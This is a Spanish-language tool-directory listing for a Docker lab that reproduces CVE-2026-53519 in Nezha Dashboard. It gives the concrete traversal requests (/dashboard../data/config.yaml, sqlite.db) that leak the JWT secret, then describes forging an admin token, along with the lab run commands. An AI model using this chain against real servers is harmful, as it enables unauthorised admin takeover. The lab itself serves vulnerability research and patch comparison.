Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/ivanesk315/cve-2026-53519
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebVirtualización de SeguridadPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónLabs y Práctica
GitHubivanesk315/cve-2026-53519

CVE-2026-53519

Laboratorio Docker que reproduce CVE-2026-53519, un path traversal pre-auth en Nezha Dashboard que filtra jwt_secret_key y permite la falsificación de JWT y la toma de control de admin.

hace 0 díasAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Lab CVE-2026-53519 - Nezha Dashboard pre-auth path traversal

Lab reproduce la vulnerabilidad pre-auth path traversal via /dashboard.. prefix confusion en Nezha Dashboard, que conduce a la filtración de jwt_secret_key -> forge JWT -> toma de privilegios de admin. Entorno Docker, separado A/B por versión para comparar vuln vs patched.

ImagenURL (loopback)Resultado esperado
Vulnerableghcr.io/nezhahq/nezha:v2.0.12http://127.0.0.1:9090filtrar config.yaml, tomar admin
Patchedghcr.io/nezhahq/nezha:v2.0.13http://127.0.0.1:9091bloqueado (404)

Ambos solo se enlazan a 127.0.0.1, no se exponen a la LAN. Inicio de sesión admin por defecto: admin / admin.

Requisitos

  • Docker Desktop (en ejecución)
  • PowerShell 5.1+
  • Python 3 (python) - para parsear sqlite.db filtrado (tiene fallback si falta)

Ejecutar lab

root@kitploit:~
# 1. Seed data + up 2 container (vuln 8080, patched 8081)
.\lab.ps1 reset

# 2. Smoke check nhanh
.\lab.ps1 validate

# 3. Chuoi khai thac day du tren VULN
powershell -ExecutionPolicy Bypass -File .\poc\poc-cve-2026-53519.ps1

# 4. Doi chung tren PATCHED (mong doi: bi chan)
powershell -ExecutionPolicy Bypass -File .\poc\poc-cve-2026-53519.ps1 -Patched

# 5. Negative controls (vi sao dung bien the nay moi leak)
powershell -ExecutionPolicy Bypass -File .\poc\negative-controls.ps1

Comandos de gestión:

root@kitploit:~
.\lab.ps1 start | stop | status | logs [vuln|patched]

Cadena de explotación (resumen)

  1. Stage 1 - Path traversal (pre-auth) GET /dashboard../data/config.yaml -> filtrar jwt_secret_key. GET /dashboard../data/sqlite.db -> obtener user id admin (id=1).
  2. Stage 2 - JWT forgery Firmar HS256 {user_id:"1", ip:"", exp:<future>} con el secreto filtrado -> Authorization: Bearer <token> -> GET /api/v1/profile (autenticación) y GET /api/v1/user (endpoint solo-admin) -> admin takeover.

Detalles de root cause: ver analysis/ROOT_CAUSE.md y analysis/vuln-vs-patch.diff. Informe completo: REPORT_CVE_2026_53519.md.

Estructura

root@kitploit:~
docker-compose.yml           # A/B vuln (8080) vs patched (8081)
seed/config.yaml             # seed jwt_secret_key co dinh (deterministic)
seed/lab_canary.txt          # canary de minh hoa file read
lab.ps1 / lab-common.ps1     # quan ly + helper (raw HTTP, forge JWT HS256)
poc/poc-cve-2026-53519.ps1   # chuoi khai thac day du
poc/negative-controls.ps1    # doi chung cac bien the bi chan
poc/parse_users.py           # parse sqlite.db leak -> user id admin
analysis/ROOT_CAUSE.md       # phan tich + ban va
analysis/vuln-vs-patch.diff  # diff controller.go v2.0.12 -> v2.0.13
evidence/                    # output tu moi lan chay (leaked-config, token, userlist...)

Notas de seguridad

Lab solo para investigación/educación en entorno local. jwt_secret_key en seed/config.yaml es un valor falso, solo para demostración. No usar la imagen/versión con esta vulnerabilidad en producción.

Fuentes

  • PoC original: https://github.com/tar-xz/CVE-2026-53519-PoC
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-53519
  • Nezha: https://github.com/nezhahq/nezha
Descargar herramienta